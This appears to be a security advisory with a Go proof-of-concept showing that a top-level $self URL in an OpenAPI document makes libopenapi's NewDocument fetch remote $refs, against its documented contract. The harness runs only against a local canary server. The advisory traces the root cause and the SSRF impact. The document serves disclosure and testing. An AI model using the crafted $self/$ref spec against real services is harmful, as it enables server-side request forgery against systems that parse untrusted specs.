package main
import (
"fmt"
"io"
"log/slog"
"net/http"
"net/http/httptest"
"os"
"sync/atomic"
"github.com/pb33f/libopenapi"
"github.com/pb33f/libopenapi/datamodel"
)
func quietLogger() *slog.Logger {
return slog.New(slog.NewTextHandler(io.Discard, nil))
}
const remoteYAML = `openapi: 3.1.0
info:
title: canary
version: 1.0.0
paths: {}
components:
schemas:
RemoteThing:
type: object
properties:
canary: { type: string }
`
func newCanary() (*httptest.Server, *int32) {
var hits int32
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
atomic.AddInt32(&hits, 1)
w.Header().Set("Content-Type", "application/yaml")
fmt.Fprint(w, remoteYAML)
}))
return srv, &hits
}
func spec(base string, withSelf bool) []byte {
self := ""
if withSelf {
self = fmt.Sprintf("$self: %s/root.yaml\n", base)
}
return []byte(fmt.Sprintf(`openapi: 3.2.0
%sinfo:
title: libopenapi self-ssrf canary
version: 1.0.0
paths: {}
components:
schemas:
Thing:
$ref: %s/remote.yaml#/components/schemas/RemoteThing
`, self, base))
}
type result struct {
label string
hits int32
allowRemote bool
skipExternalRefs bool
baseURL string
}
func runCase(label string, withSelf bool, skipExternal bool) result {
srv, hits := newCanary()
defer srv.Close()
specBytes := spec(srv.URL, withSelf)
var doc libopenapi.Document
var err error
switch {
case skipExternal:
cfg := datamodel.NewDocumentConfiguration()
cfg.SkipExternalRefResolution = true
cfg.Logger = quietLogger()
doc, err = libopenapi.NewDocumentWithConfiguration(specBytes, cfg)
case !withSelf:
// Negative control: the library logs an error when it can't resolve
// the ref. Quieten it so the report output stays readable.
cfg := datamodel.NewDocumentConfiguration()
cfg.Logger = quietLogger()
doc, err = libopenapi.NewDocumentWithConfiguration(specBytes, cfg)
default:
// Positive case: plain NewDocument(), whose docstring (document.go:137)
// states it "will NOT automatically follow ... any file or remote references".
doc, err = libopenapi.NewDocument(specBytes)
}
if err != nil {
fmt.Printf("[%s] NEW_DOCUMENT_ERROR: %v\n", label, err)
return result{label: label}
}
if _, buildErr := doc.BuildV3Model(); buildErr != nil {
msg := buildErr.Error()
if len(msg) > 80 {
msg = msg[:80] + "..."
}
fmt.Printf("[%s] build_err=%q\n", label, msg)
}
r := result{label: label, hits: atomic.LoadInt32(hits)}
if rolo := doc.GetRolodex(); rolo != nil && rolo.GetRootIndex() != nil {
cfg := rolo.GetRootIndex().GetConfig()
r.allowRemote = cfg.AllowRemoteLookup
r.skipExternalRefs = cfg.SkipExternalRefResolution
if cfg.BaseURL != nil {
r.baseURL = cfg.BaseURL.String()
} else {
r.baseURL = "<nil>"
}
}
return r
}
func main() {
cases := []struct {
label string
withSelf bool
skipExternal bool
expectHits bool
}{
{"default-with-self (POSITIVE: bug)", true, false, true},
{"default-no-self (NEGATIVE: default safety)", false, false, false},
{"skip-with-self (NEGATIVE: caller opted out)", true, true, false},
}
failures := 0
for _, c := range cases {
r := runCase(c.label, c.withSelf, c.skipExternal)
fmt.Printf("[%s]\n hits=%d allowRemote=%v skipExternal=%v baseURL=%s\n",
r.label, r.hits, r.allowRemote, r.skipExternalRefs, r.baseURL)
got := r.hits > 0
if got != c.expectHits {
fmt.Printf(" MISMATCH: expected hits=%v, got hits=%v\n", c.expectHits, got)
failures++
} else {
fmt.Printf(" OK\n")
}
}
if failures == 0 {
fmt.Println("\nAll assertions matched expected behavior (bug present).")
os.Exit(0)
}
fmt.Printf("\n%d mismatch(es).\n", failures)
os.Exit(1)
}
Summary
libopenapi.NewDocument(spec).BuildV3Model()is documented as never automatically following remote$refs, but a top-level$selfURL in an OpenAPI 3.1 or 3.2 document silently flips that switch. The document-supplied$selfis copied into the index'sBaseURL, which is the gate that turns on remote-ref lookup. Any external$refin the same document with a recognized extension (.yaml/.yml/.json) is then fetched via Go's defaulthttp.Client, with no opt-in from the caller needed.Root Cause
Source path through the library:
datamodel/spec_info.go:184-196extracts a top-level$selfvalue from OpenAPI 3.1/3.2 documents intoSpecInfo.Self. No validation, no opt-indocument.go:130-143NewDocument()documents that the function "will NOT automatically follow ... any file or remote references."document.go:327-346BuildV3Model()fabricates adatamodel.NewDocumentConfiguration()if the caller passed none. The defaults areBaseURL == nil,AllowRemoteReferences == false. It then callsv3low.CreateDocumentFromConfig(info, config)datamodel/low/v3/create_document.go:162-201is the leak: whenconfig.BaseURL == nilandinfo.Self != "", the document's$selfURL is parsed and assigned to a localbaseURL, which is then copied intoidxConfig.BaseURL(line 201)create_document.go:251is the gate:if idxConfig.BaseURL != nil || config.AllowRemoteReferencesconstructs aRemoteFS, setsidxConfig.AllowRemoteLookup = true, and adds it to the rolodex. Caller-supplied vs$self-derivedBaseURLis no longer distinguishableindex/rolodex_remote_loader.go:485-490installshttp.Client{Timeout: 120 * time.Second}.Getas the defaultRemoteHandlerFuncwhen the caller didn't supply oneindex/find_component_external.go:40-49opens external refs through the rolodex when the URL has a recognized extension.SkipExternalRefResolution(line 21) is the only short-circuit, and it is off by defaultThe net effect: a
$selffield in the document is sufficient to convert "never fetch remote refs" into "fetch any remote ref."Reproduction
Place the 3 files in a directory and run
go run ..main.gogo.modgo.sumExpected output:
Impact
The library's documented contract for
NewDocument()is "no automatic remote/file ref resolution." Anyone reading that promise and feeding attacker-supplied OpenAPI documents toNewDocument(...).BuildV3Model()is affected.The attacker controls:
.yaml/.yml/.json(unless the caller setsAllowUnknownExtensionContentDetection, which is off by default)The primitive is:
Go-http-client/1.1with a 120 s timeout, useful for slow-loris-style holding of resources in the parser process.It is not arbitrary-protocol: Go's
http.Client.Getwon't speakfile://,gopher://, or talk to non-HTTP services. The fetched body is also parsed as YAML/JSON, which constrains the response shape